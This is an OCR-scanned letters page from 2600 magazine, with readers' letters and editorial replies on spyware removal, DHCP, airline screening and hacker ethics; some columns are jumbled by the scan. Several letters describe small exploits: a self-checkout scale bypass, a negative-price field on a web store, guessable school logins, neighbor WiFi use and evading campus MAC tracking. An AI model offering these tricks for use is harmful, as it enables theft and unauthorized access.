,skillset, strategies employed, luck, foresight, organiza-
tion, and so forth. There are a few Legitimate lottery con-
sultants out there with a proven track record winning \
jackpots for schools so that they (the schools) can afford
textbooks and course materials. I've interviewed a couple
of consultants and have reviewed t h e i r game tickets and
modus operandi. It's not surprising t h a t these consul-
tants are often engineers who enjoy t h e study of num-
bers and their behaviors.
Playing the lottery can be a good thing if done i n
moderation and if the player has a n understanding of
the dynamics/challenge involved. And if one paper plays,
like people do i n commodities t o learn t h e a r t of trading,
it doesn't have t o cost anything. You can always wager
real money when the jackpots are b u i l t up, on average,
every two t o three months. Additionally, different lottery
games offer better odds. Ultimately, choosing a game
with some forethought makes prudent sense.
We also need t o keep i n mind t h a t our involvement i n
games teaches us obscure skills f o r complex problem
solving!
Ienjoy your magazine. It's helped me with creative-
divergent thinking.
Ruth (QuanturnResearcher)
Lottery consultants winning jackpots so schools can
buy textbooks? What a bizarre concept.
Dear 2600:
For several issues now people have created rather
convoluted ways of getting their I n t e r n e t I P address
when it changes due t o having a dynamic address. Up-
dating a website or having the address emailed t o them
is reinventing the wheelwhen dynamic DNS services exist
Like that on dyndns.org. This site gives you a domain
name for free from many they have available like
mine.nu. So your address would be s0mename.mine.n~.
On your box you run a daemon which updates your Inter-
net IP a t dyndns whenever it changes. There are free pro-
grams t o do this or ones that cost money. Now when you
need t o access your computer/server from t h e Internet,
just use your domain name (s0mename.mine.n~) and it
will always point t o your dynamic IP. http://www.dyndns
-.org/services/dyndns/
chuck
Dear 2600:
Iam actually able t o provide a b i t o f Light a t the end
of the tunnelfor students Laboring under restrictive poli-
cies and asinine rules about network security. Irecently
found multiole vulnerabilities i n mv school's private net-
work, vulneiabilities that were m u i h more cdmplex than
iust adminladmin loain combinations. While Idid duti-
?ully report it t o the-IT department o f my school, they
just asked i f Icould come i n and explain i t t o the network
administrator. Ifelt slightly nervous because if this guy
thought Ihad "hacked" the system, then Icould have
been expelled/sued. Iwent i n and t h e people were sur-
prisingly friendly, not accusing me o f hacking or any
other such stuff. They agreed t o patch t h e security holes
and thanked me for my time. They d i d this even though I
could have potentially stolen admin access t o our net-
work and consequentially SSNs from t h e students. This is
especially dangerous because Igo t o a private school
which, while having a diversity of economic classes, also
has students who probably have i n excess o f several hun-
dred thousand dollars i n their bank accounts.
Iam fairly sure that the admin knew Icould have
done this, but he still thanked me f o r my time and com-
Page 3 3 1
f
mended me for making the network secure. Hopefully
this will be a beacon of hope or something t o students
everywhere.
Steve
Dear 2600:
As one of the poor souls who happen t o work i n and
around the airline industry i n these times Ican say that
some of your points about the "selected" process is
wrong. You are right that if you see four S's on your
boarding pass that you have been selected for random
screening, but at the same time there are ways out of it
which I'llget into. You stated that people are targeted
for the type of clothes they wear or what kind of hairstyle
they have. That is incorrect. Most of the time a person re-
ceives the S's on their boardina Dass because thev buv a
one-way ticket (most hijackers'have historical[; d i n e
this), paid cash (once again history backs this up), are
going t o a "hot spotMdestination, are (the worst one yet)
transfers from another airline, or somehow are on the
government watch list.
When you travel and see these S's on your ticket,
your ticketagent can remove them i n most cases. When
talking t o the ticket agent remember t o be polite and
friendly. If you're not they can make your trip pretty bad.
If you are military traveling under orders you can easily
get this removed by showing your I D and orders. I f you
happen t o share the name of someone on the watch list,
contact your local FBI branch and they might be able t o
get your name off the list. This does work as Ihave seen
it done.
While Idon't like all the rules set i n place Ido see a
need for some of them. When traveling remember that
the rules aren't meant t o restricttravel, just t o make sure
that it is done safely.
Mouser-inc
While the reasons you give are certainly used to jus-
tify additional screening, people are also targeted be-
cause o f the way they look or act. The latter is most likely
done by humans and the former by machines. But i n all
cases, it's pretty ineffecfive as anyone with an evil motive
and halfa brain can easily alter any o f these parameters.
Where the screening process is effeh've is i n getting the
traveling public programmed to accept this kind o f treat-
ment since it's allegedly being done to keep them safe.
Dear 2600:
Servus Casandro asked about writing an article on
satellite television outside the U.S. There is already free-
to-air information published. Anyone with an IRD digital
down converter, a satellite dish, and an understanding
of how t o peak an antenna on a satellite with the appro-
priate LNA/LNB should look at http://www.global-
cm.net/mpegZcentral.html.
haydenlh
Dear 2600:
Patrick Madigan's article i n 21:4 regarding the re-
moval of Ad-ware using various tools was fantastic. How-
ever, as a sysadmin who's run into his fair share of users
who click "yes" t o just about anything under the sun,
there's one thing I'd like t o add. Most spyware/adware
hangs out i n the Temp directory, under the Local Settings
folder on a machine (a hidden folder i n c:\Documents
and Settings\<user name>\Local Settings\Temp\). Go-
,
ing into an infected computer i n Safe Mode and navigat-
ing t o this directory usually reveals quite a few
executables (as well as a slew of temp files that aren't re-
ally needed). Occasionally, spyware also lurks i n the
c:\Documents and Settings\<user name>\Application
&Data\ folder as well, but it's a little more dangerous t o
start removing software from there as there might be
something you need.
The best way I've found to remove adware/spyware is
t o install your spyware removal tools of choice (Spybot
Search and Destroy/Ad-Aware/CWShredder/Hijack This).
Then, reboot i n Safe Mode, go t o the Add/Remove pro-
grams applet, and uninstall anything you find i n there
that you don't want. Then navigate t o the Local
Settings\Temp folder Imentioned above and clean it
out. Then run your choice of spyware removal tools. Once
these are done, YOU may Want t o navigate t o the registry
t o check theRun that Patrick mentioned (HKw-
~C~rrent~USER\Software\Microsoft\Windows\Current
-Version\Run).
Good luck!
Mogus
Dear 2600:
After writing the Article "Selfcheckout or ATM?" i n
21:4 Idid a little more exploration with the NCR E-Series
Selfcheckout systems. Ihave found that if you press the
help button before starting your order (or selecting a
language) it w i l l give you the choice of "Login" or "Call
for Help." During this time you can put anything you
want into the bagging area without alarm. Hitting the
"Go Back" button will recalibrate the scale before the
order is started.
Bob Krinkle
As always, it's a bad idea to actually try and get away
with physically stealing items. But learning where the
weaknesses are i n these machines is quite fascinating.
Questions
Dear 2600:
One day Iwas messing around trying t o get netmeet-
i n g t o work so an anxious friend could test his new mic. I
bypassed my router and connected directly t o my com-
puter's NIC. Inoticed that for the first time i n ages my
WAN IP address had changed. Curious like most, Ire-
booted the modem t o see i f it changed again. It didn't.
So Iconnected back t o my router, rebooted the modem
and voila, there was the old IP address again. Ihad noth-
ing better t o do so Icloned the MAC from another NIC
and it got a new, different IP address. Each MAC Ien-
tered into the router's WAN side, fictitious or real, re-
tained a unique IP address that it pulled back after
numerous MAC changes and reboots.
I s this normal?
llx
Yes, this is normal. DHCPservers assign I P addresses
based on the MAC (physical) address requesting it. I f y o u
change your MAC address, the DHCP server will assign
you a different I P address. Change the MAC address back
and you'll be assigned the original address, provided the
lease did not expire. Be careful, though. ISPs noticing
this acfivity tend to get upset and may suspend your ac-
count, requesting an explanation o f this acvtityi. Most
terms o f service allow only one I P address per account.

/Dear 2600:
It ain't easy being green. I have noticed through the
years how often you refer t o intelligent people as "hack-
ers." Whether or not we have coined the term, i t is still
spent describing us. I don't condemn popular culture for
its misuse of labels as a way t o better understand its sur-
roundings. However, I do question the morality of a pub-
lication with such high standards as 2600 using the term
"hacker" so loosely. Perhaps promoting this label is a
misinterpretation of what intelligent people do in their
spare time. Please correct me if I am mistaken.
David Oliver
We'd like some more specifics as to how we're using
the term loosely. Hackers are curious and inquisitive by
nature and will spend an awfully long time trying to find
results. That holds true of people writing computer pro-
grams, scanning for interesting phone numbers, decrypt-
ing algorithms, defeating security systems, and any
number of other am'vities. They are all bound together
by a quest for knowledge andaren't inclusive or exclusive
of any pam'cular age group, sex, race, nationality, etc.
Technology isnY even a requirement for the development
o f a hacker mindset. But people who have no interest in
the actual learning process and are focused instead on
stealing, intimidation, bragging, privacy invasion, and
other such ends really aren't hackers in our opinion. The
mass media may disagree since they consider anyone
who touches a computer and then does something bad to
be a hacker. That seems to be the epitome o f a "loose"
definition. Of course, it's also possible for someone t o
have a hacker mindset and then use that ability for evil
purposes. But when they make that transition, they
pretty clearly leave the hacker world behind.
Dear 2600:
I was wondering if I could be able t o officially link t o
your website from mine. My website is still in its beta
form but is going t o be a computer related site.
Batman 24
We don't know what you mean by "officially" but
regardless, no permission is necessary for you t o link
to anyone else on the net. Don't let anyone tell you
otherwise.
Dear 2600:
I recently took a temp job and my employer gave me
one of his cards so I would have his cell phone number.
On this card were several phone numbers for the com-
pany. One of the numbers was supposed t o be a toll-free
number t o contact someone about bids/quotes. Instead,
when I dialed a computerized voice said "Welcome t o Ver-
izon Wireless Airfone, your connection t o the skies. We
are now connecting you t o the aircraft." I did not stay on
the line long enough t o see if I would actually be con-
nected t o an airplane as I was trying t o sort out an issue
regarding my pay check. Would this have been a toll-free
call and if I had stayed on the line would I have been
connected t o someone on an airplane?
Jason
It would certainly appear as if you were about t o be
connected to someone on an airplane. You will undoubt-
edly regret not embarking on this adventure for the rest
o f your life. As to how this happened, we suspect your
company simply forwarded the toll-free number to follow
whoever usually answered i t while they were traveling.
( I t ' s also possible that this toll-free number always goes
\
to a cell phone and i t was the cell phone that was for-
warded. Verizon Wireless Airfone allows Verizon Wireless
customers to forward their cell phones directly to their
seats on airplanes and bill calls from t h e plane to their
cell phones a t much lower prices t h a n non-Verizon cus-
tomers. (We suspect there must be numerous cases o f
people who forget to "unforward" t h e i r phones when
they leave the aircraft. We're curious whether or not sub-
sequent passengers wind up gem'ng all kinds o f un-
wanted calls as a result.)
Dear 2600:
I am under the impression that current cell phones
are GPS enabled for "emergency" location by those who
w a n t t o locate them. I f this is true, can t h e GPS function
and phone location be displayed on t h e user's handset?
Sometimes I too would like t o know where I am.
DP
Most recent cell phones do have a GPS receiver (as-
sisted GPS, to be more specific) contained within and are
usually clearly marked as having such a device. They are
as a rule only acfivated when using t h e E911 sem'ce and
are not continually receiving coordinates when an emer-
gency call is not in progress. However, there is generally
an admin/debug menu which allows f o r testing o f the de-
vice and therefore displaying your coordinates. The
method varies greatly based on the rnake/model ofyour
cell phone, but there are often instructions to do this
posted online.
Dear 2600:
When I send you guys articles w i l l you edit them? I
mean, I spend more time editing t h e m than I do writing
them. Would you be ever so kind as t o do that for me, or
is that my job?
William
All articles are edited for clarity and various other
things. It's yourjob t o make your article as literate, fac-
tual, and interesting as possible. It's a lot less likely to
even be considered i f it's painful t o read.
Dear 2600:
I am a former employee of a company that I want t o
write an article about. One thing I am worried about
though is having them discover who wrote i t . What kind
of protections do you offer for those who submit arti-
cles? Do you ever reveal where an article came from?
Dave
We have never revealed the author o f an article to
any authority or outraged corporation. However, people
have been tracked down because o f t h e byline they used.
So be very careful what you select a s your byline i f you
want to stay anonymous. Be aware t h a t sometimes your
username (not your full email address) may wind up be-
coming your byline i f there's no other name given and no
request for anonymity. Be sure t o make any such re-
quests in the same submission as separating them will
increase the odds that the wrong byline will be used. You
should also be careful where you make submissions from.
I f y o u want t o make a submission concerning a particular
company, it's not a good idea to use their mail servers t o
send i t from. Also, be aware that using encryption won't
necessarily help you in such a case a s the fact that you
sent email t o am'cles@2600.com will still be registered
(this incidentally is the only email address that accepts
am'cles). An anonymous remailer would fix that but
page 35 1
/might raise other flags within the organization. We gen-
erally prefer cleartext ASCII from an address that you will
be reachable a t for some time. Many encryption attempts
wind up using incompatible keys o r versions and we very
quickly lose patience when there's a huge pile o f articles
to go through.
Dear 2600:
My friend has a sister who i s paranoid. She installed
a spyware program called " I Am Big Brother." He wants t o
get rid of it because it logs everything he does. Does
anyone know any vulnerabilities? Iam going t o get rid of
it myself at our school and he thinks it would be a good
idea.
Black-Angel
We've been running a number o f am'cles about de-
tem'ng and removing spyware. There are different meth-
ods for different programs. We're certain this one can be
defeated as well. We can only hope that the irony o f a
sister running a program called "IAm Big Brother" and
creating paranoia to address her own isn't lost on any-
one. Incidentally, the program can be found a t
http://www.iambigbrother.org/.
Appeals
Dear 2600:
There i s a neo Nazi site currently distributing tens o f
thousands of hate music filled CDs. Please let the 2600
network know. I hope t h a t someone w i l l choose t o t r y
and shut down this site. Iknow it's against many hackers'
ethics to wreck people's sites, but I hope that someone
will make an exception i n this case. We have t o stop
these kinds of evil people! Please use t h e power of your
group to rid the world of an outlet for f i l t h and hatred.
Ionly know about 2600from online wanderings back
i n high school. I have no computer skills or hacker
friends. You guys were the only thing Icould think of t o
stop this. Please help!
DB
Think about what happens when someone tries this
tactic on us. We wind up getting more support than ever
before from people and places we never would have been
i n touch with ordinarily. By attempting this on others,
you're opening up the same type o f support for them. I n
other words, you'll be making them stronger. You should
have the ability to counter hate speech with words and
logic, rather than resorting to desperate measures. You
need to be attacking the cause o f the problem, n o t j u s t
the symptoms. The assumption that shum'ng down sites
is what hackers are all about simply strengthens the in-
accurate mass media perception o f us. Any idiot can use
brute force to try and shut someone up. Let's hope that
we're all a few steps above that.
Utter Stupidity
Dear 2600:
Iam a high school student i n Raleigh, NC. My high
school belongs t o the Wake County Public School System
and they use Blackboard for online teacher-student rela-
tions. On Blackboard a student can login and access their
grades for certain classes, read announcements from
their teachers, and turn i n assignments electronically. I
was introduced to this system i n my Programming I1 class
\ a n d Ithought it was kind o f strange that i n order t o
login, the student would use his/her "NC Wise" numbe?
(student ID number) as both their username and their
password. I n Wake County, a l l the students' NC Wise
numbers start with 20, and then there are four random
digits after 20, like 201234 or something. Therefore any-
one could enter 20, four random digits, and then get ac-
cess t o that student's grades and personalinformation. I
tried a few myself and even accessed a teacher's account!
If Ihad wanted to, I could have changed a l l of his class's
assignments, not t o mention his own password so that
he could not login. I j u s t wanted t o warn the community
about Blackboard which is used i n schools nationally.
Students who use this and have the same login require-
ments as Wake County does should change their pass-
words for better security.
Public Display
I n a system as badly designed as this, one really has
an obligation to demonstrate these monumental flaws.
The irony is that anyone doing this would be blamed for
the privacy invasion rather than those who designed this
travesty. We hope this opens some eyes and we invite
anyone else living with such poor security to l e t us know.
Dear 2600:
There i s a State of CaGfornia website t h a t lets you
submit a license plate or VIN number t o show the smog
certifications for that vehicle. When you enter a VIN or
plate it shows both the VIN and plate for that vehicle. It
makes it easy for car thieves t o stamp out fake VIN tags
t o match the plate. The site is a t http://www.smogcheck.
sca.gov/vehtests/pubtstqry.aspx.
gmitch
Why such information is available t o the world is
beyond us. But it enabled us to learn that there used to
be a 1989 Buick Century out there with a "2600" plate
that has since changed to a more normal plate, possibly
due to a sale. By what twisted logicshould anyone i n the
world be able to have access to this information plus a
whole l o t more?
Appreciations
Dear 2600:
I want t o thank you with a l l my heart for your steady
voice against war. I f TAP was s t i l l publishing, I believe
they might be holding strong as well. But so many others
have caved. Disheartening t o say the least.
Ijoined the army right when Operation Sundevil be-
gan (probably beating politicalimprisonment by t h e skin
of my teeth) and I've always known how many from your
readership are conservative libertarians. So it takes guts
for you t o speak out.
Thanks for being you.
marco (aka prime anarchist)
You're welcome. But we doubt we've cornered the
market on opposing the senseless waste o f human life.
There are many "conservative libertarians" speaking out
as well.
Dear 2600:
Ijust wanted t o write t o say that I picked up my first
copy o f 2600a few days ago and read it over. For the last
two years Ihave developed a love for computers and
have wanted t o know everything I could possibly learn
about them. I don't know much but I know more than
most around me. I owe part of that t o people like the

Robbie Brewer
Dear 2600:
Ijust wanted t o let you guys know that Ilove the
magazine. Ilove it so much Ijust might name my first
born "Twenty Six Hundred." I'm saving for the "all back
issues and lifetime subscription" deal. Question: How
long will those "special prices" last?
Rob Hundred almost wish Icould have ridden t h e rest o f t h e way with
The prices go up occasionally as more back issues be-
come part o f the package. But we'll always try to have good day.
good deals for people o n our Internet store
(store.2WO.com). We suggest buying them before your quite convincing, Ican't help but wonder if he truly was
first born grows up and kills you for giving him/her that
name.
I Security Issue
Dear 2600:
Entering my third decade of paranoia Idid some web
searches through google t o find out how "far outthere" I
am. Not using complicated google hacks or anything like
that I simply used my paranoia and hatred of "big
brother" t o aid me. A few years ago Irealized that every-
one will be arrested, jailed, or ticketed for the most mi-
nor offenses but the paper trail has made its way online.
Just about every police department, jail, or correctional
facility has a website and often posts the offenders on-
line including name, age, phone, and (gasp) Social Secu-
rity numbers so i f you were t o dive into these records you
could trace someone back as far as the early 90s and
have more than enough evidence t o steal their identi-
ties.
Brian
I f it wasn't so sad it would be funny that these orga-
nizations are giving such ammunition to future potential
criminals. This seems to be y e t another way that prison-
ers are being punished above and beyond their actual
sentences.
I Experiences
Dear 2600:
I've worn my 2600 shirt on many occasions, not t o
show off but t o support the magazine and the informa-
tion it disseminates. As a NOC monkey on Telco Alley i n
downtown LA, Ifind public transportation the best way
t o get t o and from work and, while the thought of being
accosted for having a shirt with the word "Hacker" on it
has crossed my mind, I've never cared enough not t o
wear it on my way t o work.
This morning, halfway t o work, an uncannily friendly
vagrant hoped on the bus. His glasses missing a Lens,
hair disheveled, and his suitcase covered i n layers of dis-
carded plastic, he carried his three string guitar i n one
hand and wheeled the suitcase i n another, excusing him-
self and politely notifying people t o watch their toes. His
demeanor struck me as odd, only because I've spent the
past three years of my life being hardened by literally in-
sane vagrants riding the bus.
Suddenly, while gazing out the window I hear a
("2600! Oooooh! I s that your shirt?!" Instinctively Ilied,
\
saying a friend bought it. He proceeded t o ask me i f I
knew what the magazine was, what 2600stood for, and a
host of other questions. Immediately I felt bad for lying.
He seemed t o be genuinely excited a n d knowledgeable.
Inever caught his name, though h e did mumble his
alleged former phreaker handle. He went on t o talk
about Cap'n Crunch, blue boxing, red boxing, trunk dial-
ing, the meetings a t Union Station here i n Los Angeles,
how he may have single-handedly driven Sprint t o switch
from five digit authorization codes t o seven t o 14, and
how he never bothered t o learn computers because he
was afraid he'd be a danger t o society and himself. I
him, but my stop came before his a n d Iwished him a
Of course, part o f me is skeptical. Though he was
a part of the phreaking scene. And if h e did f a l l through
the cracks, how? And why? Maybe w e ' l l cross paths an-
other day, and Ican treat him t o lunch and hear his sto-
ries. Or maybe someone reading this knows exactly who
I'm talking about. Either way, it definitely made for an
interesting morning and Ithought I'd share it with you.
aaron
Yet another instance o f our shirts bringing people
together.
Dear 2600:
Six year reader, first time writer. I have a confession
t o make t o you guys: I'm addicted t o free Internet. I've
been accessing my neighbor's wireless high speed Inter-
net connection for about a year now. It started off small
a t first, just an HP Pavilion laptop w i t h a Linksys wifi
card. Iwould only connect t o the network when Iwas ex-
pecting an important email and t h e like. But then I
started connecting all the time and staying connected. It
got worse. When the signal wasn't strong enough and
wouldn't connect me, Iwould get t h e high speed with-
drawals. Ihave since gotten greedier and now have a
network of two PCs, two printers, a range expander, said
laptop, and Ieven have plans t o b u i l d t h e "Cantenna"
(www.oreillynet.com/lpt/wk~/448), a l l running wire-
lessly and connected t o my neighbor's Internet. The
paradox is this: Iwould never have learned all the things
Idid t o set up this pirated network if t h e y had simply se-
cured their router properly. It's n o t m y fault that when
installing their connection, they j u s t clicked "Next" 15
times, is i t ? I've never actually damaged anything on
their end and I have no intention o f doing so (even
though they had logs disabled, so t h e y wouldn't know
what went wrong anyway). Just a random thought Ihad
today. Thanks for listening. Keep up t h e great work guys.
Mi key B
Observations
Dear 2600:
While Iwas visiting a well-respected drive-cloning
company's website, Inoticed an interesting ad. The ad
flashed an image of a young girl and t h e n commented on
how they were fighting child exploitation. Another pic-
ture of a building blowing up and a comment that they
were fighting terrorism. The next picture was of a cop
holding weed arid the note that drug use is a t an all time
high. The last frame was the one t h a t intrigued me. The
caption read "Hackers cost the world economy billions"
/and the image was of a computer screen with the 2600
website loaded. I was surprised t o see that as I am an
avid fan of 2600 and know that you don't promote the
malicious use of information. Keep up the good work,
guys!
k~ l e
Even more unbelievable than the existence o f this
site is the fact that you didn't tell us its name. Fortu-
nately, other readers shared this info.
Dear 2600:
I suspect you are aware of this but if not: 2600is fea-
tured as one of the evils in the ad at http://logicube.com
u/products/hd-duplication/md5.asp.
scotk
It's amazing to us that terrorism, child exploitation,
drug trafficking, and white collar crime are all repre-
sented with generic images but when i t comes to "cyber
crime," they have no problem sticking our name up there
in lights. While most other organizations would contem-
plate legal action, we'll simply issue a standard Level One
electronicjihad. We mustn't disappoint after all.
Dear 2600:
I was recently looking around on www.skinit.com for
cell phone or PDA skins. I was looking at the skins for the
Sidekick I1 and went through the whole purchase process
without the intent of actually buying (probably because I
don't even have a Sidekick). But there was one thing I
noticed. When you buy a skin you choose the picture you
want the skin to have and at the bottom of the window i t
has a space that shows the price (usually $0) and then i t
charges you $9.95 for the skin itself. What I realized is
that if you type "-9.95" in the price space i t will take that
off the final order. This is a way t o get all the skins you
want for free (or at Least until one of the skinit employ-
ees reads 2600). Maybe you can even make money off of
this!
SystemDownfall
Maybe you can even start a life of crime just by typ-
ing in some numbers on a web page. This is an example
of a really poorly designed interface, many of which exist
on the net. Or i t could be a really well designed interface
to compile a database of dishonest people.
Dear 2600:
Check i t out ... M S teaches parents t o understand
their children's "133t speak" - http://www.microsoft.com
~/athome/security/children/kidtalk.mspx.
Doda McCheesle
This is a must read for anyone who wants to laugh
all night. We wonder i f future archaeologists will be
studying this language with the same attention given to
ancient Greek. Some highlights:
"While it's important to respect your children's pri-
vacy, understanding what your teenager's online slang
means and how to decipher could be important in certain
situations and as you help guide their online experience.
While i t has many nicknames, information-age slang is
commonly referred to as leetspeek, or leet for short. Leet
(a vernacular form of 'elite7 is a specific type o f com-
, puter slang where a user replaces regular letters with
other keyboard characters to form words phonetically -
I creating the digital equivalent of Pig Latin with a twist of
hieroglyphics.
"Leet words can be expressed in hundreds of ways us?
ing different substitutions and combinations, but once
one understands that nearly all characters are formed as
phonemes and symbols, leetspeek isn't difficult to trans-
late. Also, because leet is not a formal or regional di-
alect, any given word can be interpreted differently, so
it's important to use discretion when evaluating terms.
The following serves as a brief (and by no means defini-
tive) introduction to leet through examples.
"Numbers are often used as letters. The term 'leet'
could be written as '1337,' with '1' replacing the letter L,
'3'posing as a backwards letter E, and '7' resembling the
letter T. Others include '8' replacing the letter B, '9' used
as a G, '0' (zero) in lieu o f 0, and so on.
"Rules of grammar are rarely obeyed. Some leet-
speekers will capitalize every letter except for vowels
(LiKe THiS) and otherwise reject conventional English
style and grammar, or drop vowels from words (such as
converting v e y to 'vy7.
"Mistakes are often left uncorrected. Common typing
misspellings (typos) such as 'teh' instead of the are left
uncorrected or sometimes adopted to replace the correct
spelling.
Leet words o f concern or indicating possible illegal
activity:
'warez' or 'w4r3z8:Illegally copied software available
for download.
'h4x1: Read as 'hacks,' or what a malicious computer
hacker does.
'prOn? An anagram o f porn,' possibly indicating the
use of pornography.
'sploitz' (short for exploits): Vulnerabilities in com-
puter software used by hackers.
'pwnc:A typo-deliberate version of own, a slang term
often used to express superiority over others that can be
used maliciously, depending on the situation. This could
also be spelled 'O\/\/n3d1 or 'pwn3d,'among other vari-
ations. Online video game bullies or 'griefers' often use
this term."
Dear 2600:
This letter is for informational purposes only as I
don't have enough knowledge of the legahties t o say
whether or not you could possibly get in trouble for it.
On that note, access rules may vary from campus t o cam-
pus.
I n this example I will use Michigan State University's
network, due t o the fact that I have personal experience
with their network. But many college campuses are set
up similarly.
When you first connect your computer t o the ether-
net ports on campus (anywhere around campus), you are
prompted t o enter a username and password (provided
by the school and tied t o your academic account). This is
fine for most people. When you enter your name/pass
you will be linking your ethernet MAC address t o your ac-
count. You are allowed t o register multiple MAC ad-
dresses, but the point is that they all tie t o your student
account. To get around this ( I personally don't like hav-
ing my Internet behavior tied t o my student account),
get a used network card. On college campuses there are
always people looking t o sell used computer equipment.
At MSU, we have an active student community with clas-
sified ads. When purchasing a used ethernet card, there
is a very good chance that the last owner didn't remem-
ber t o remove the registration from his/her card before
EL00 flagazine J
(elling it. Pop that i n your machine, plug in, and you
should be able t o stay away from easy tracking.
Like Isaid, many other universities use the same
MAC/account registration. Just something t o think
about.
Impact
Dear 2600:
Check out the hacking/puzzle game on
www.ninebows.com. There are nine steps and it seems
like nobody can get past t h e second. Google it and you
can find some really long forum threads about it too.
fv
I t ' s a good way to lose your mind without having to
leave the house.
Dear 2600:
Not only i s Ikea a great store t o buy stuff, it's loaded account t h e human factors i n t h e equation.
with workstations t o lay their products out on. Although
Ididn't play too much, Iwas able t o connect t o t h e other
XP PCs on the network, go i n t o the C drive, change the
screensaver (but Iput it back), and create and delete a
test text file on t h e desktop.
Iwas feeling a b i t paranoid so Ididn't bring up IE or
write down the IPS but Ihave a feeling it would have
been fun. During t h e rest of my visit i n the store Icould-
n't spot a single security camera. Imust go back and
play.
Rifkey would have t o split t h e prize with many more people. I f
Dear 2600:
Istumbled on sort o f a "security through obscurity"
type approach t o securing a SOHO router, such as a
linksys. As you know, most SOHO routers have an inter-
face which i s accessible through port 80 or http://ip-ad-
dress which is sometimes accessible publicly. To drive
away people attempting t o login t o your router (you ob-
viously want t o change the default password), you can
also forward port 80 t o a machine that doesn't exist.
When they t r y t o login t o your router they w i l l be given
an error message that the host was not found. Just an
added layer o f protection.
p4p3r t l g 3 r share the payout with the other members. I t is exactly
Dear 2600:
Iwas looking around at archive.org, and noticed that
you can submit a URLand they will bring up archived ver-
sions o f the site. Ityped www.2600.com and found quite
a few older versions .... Iwas browsing one of t h e older
versions of your site and saw the link: "Mirror DeCSS." I office pools o f lottery players. Choosing 2 0 picks o u t o f
clicked on it and sure enough they have a l l of the mirrors
still linked, even though you were forced t o take
them o f f of your page .... Ijust thought you might find
this interesting. Iwonder i f the MPAA is going t o sue
archive.org as well for archiving a page with "illegal
content."
drlecter
Dear 2600:
Just wanted t o let the fans of 2600 know that Canada
is certainly still.selling t h e magazine. I n fact, i n South-
ern Ontario Ihappened i n t o a Coles Bookstore (in Brant-
ford) and Chapters (in Ancaster) and found copies i n
both locations. So Isuspect the other stores that were
visited may have been sold out or had the copies hidden
away. I n both locations 2600 was displayed clearly i n the
( f r o n t row of magazines. When Ipurchased my copy from
the Chapters, it was shown on my b i l l as "2600 Hacker
\
Quart" which Ifound terribly interesting.
Freezing Cold 2600 Fan
Dear 2600:
Saw a letter i n t h e latest issue o f 2 6 0 0 t h a t this guy
can't get it a t Chapters i n Canada. Just s o you know, I get
it there a l l the time, including this issue.
Terry
That's a pretty neat trick.
Responses
Dear 2600:
Ienjoyed reading t h e mathematical analysis i n How
t o Hack the Lottery (21:3) but Iexpected more from
2600and was disappointed the author failed t o take i n t o
The author i s correct t h a t you c a n n o t fundamentally
change the odds but what you can do i s balance t h e risk
t o reward ratio. The purpose o f a l o t t e r y syndicate i s n o t
t o increase your odds of winning b u t t o share both t h e
risks and the rewards over t h e long run.
He also says there i s no need t o s t a y away from pat-
terns as all numbers have an equal chance o f coming up.
While t h a t is true on one level there w i l l always be some
people playing t h e obvious patterns l i k e 1,2,3,4,5,6. Al-
though t h e odds are no difference if you did win you
you want t o t r y and maximize your p o t e n t i a l winnings it
helps t o pick a combination that i s n o t t o o likely t o col-
lide with other people's choices. It i s a llabout balancing
the risks against the rewards.
Having said all that, it i s worth remembering t h e
quote: "The lottery is a tax on t h e mathematically
challenged."
Alan Horkan
Dublin, I r e l a n d
The author o f the piece, Stankdawg, replies:
"A 'lottery syndicate' is a term t h a t simply refers to
people gem'ng together i n a group t o t r y t o increase
their chances o f winning b u t a t the risk o f having to
what y o u describe, a risk-to-reward approach o f playing.
I absolutely touched on this in m y a r t i c l e i n the first
paragraph under the header 'Myths' since it is a very
common theory.
T used a small example o f a 'syndicate' referring to
almost 1 6 million is still pretty small, b u t b y increasing
the syndicate y o u could continually increase your
chances o f winning right up to the p l a y every number'
theory. A t the same time, however, you are causing the
amount o f winning to decrease due t o the shared win-
nings with each additional syndicate member. This is a
true statement. Some people who believe i n this
myth/theory think that they will win m o r e frequently due
to the odds being better (keep i n m i n d t h a t they are still
phenomenal) and even if they have t o share it, it will pay
o f f in the long run through repeated small wins o r one
b i g win.
"The problem here i s that it is j u s t as much o f a the-
ory as everything else. I t will take l o n g term analysis to
decide whether it does pay o f f i n t h e l o n g run. Without
going i n t o the business viewpoint t h a t money that does-
n't earn interest is actually losing m o r e money, I will
Page 34'
/;imply point a t the facts. Do a search for 'lottery s y n d t
cate wins lottery' and you will n o t find any large syndi-
cates winning any Large amounts o f money with any
regularity. Iwould debate that any individual wins b y a
syndicate were b y random chance more than any 'sys-
tem.'
"Looking a t the facts, Isimply do n o t see enough ev-
idence to say that syndicates are any more successful
then individual groups. Isaw a few office groups that
won the lottery, b u t this happened without any large
syndicate effem'veness. I f these syndicate systems
worked, wouldn't more people have seen and heard
about the success stories? I t is kind o f hard t o hide a pat-
tern o f success i n winning the lottery! These were small
office groups with only one that was over 3 0 people.
Even then, it was the same simple luck b y which individ-
ual winners have won. Even if a syndicate o f 500 people
won I 0 million dollars, when you split that up they get
$20,000 each. Most syndicates look to be around 50 peo-
ple i n number depending on the lottery i n question so
that they guarantee smaller wins while hoping for 'the
b i g one.'It is definitely an increase i n your odds which I
stated i n my article, b u t it is still ridiculously stacked
against you no matter what.
"Common sense comes into play here. I f a syndicate
were really that effecfive, don't you think the lottery
would rig it with more numbers to nullify that effecfive-
ness? Trust me, they have done their homework and they
are glad to let the syndicates pump up the jackpot for
them. They know that i n the long run, they will always
win.
"In m y opinion, if I were going to play the lottery, I
would take my dumb luck chance a t a 1 0 million dollar
payday than sharing it with 499 others. Of course this is
my opinion, and others may disagree. But I will keep my
money i n my pocket. "
Dear 2600:
My letter is i n response t o LabGeek's letter i n 21:4. I
had the privilege of working as part of the management
team of a new Wal-Mart i n the Northeast. The yellow line
i s drawn as a guide for shoppers so they can visualize
where the border is. The actual border i s created by a
wire running underground. The system is based on RF,
though Ido not know the actual frequencies or t h e
range. We have tried lifting the carts a foot o f f t h e
ground, but the locks still engaged. Amusingly, per
2600's response, we were successful i n getting over the
barrier by lifting the carts above our heads.
Jaypoc
Dear 2600:
It looks like the article i n 21:l ("Setting Your Music
Free") and the response i n 21:3 from Cameron both mis-
takenly refer t o AAC codec as an Apple Product. The AAC
(Advanced Audio Coding) was developed by Dolby Labs
and is integrated into MPEG-4. Apple is merely an early
adopter of the technology, incorporating MPEG-4
i n t o their latest QuickTime, making it the default codec
i n iTunes, and adding support for it i n their hardware
players.
Alop
Dear 2600:
First off guys, great mag, radio show, con, DVD....
, I'm writing about WhiteHat's letter about date format
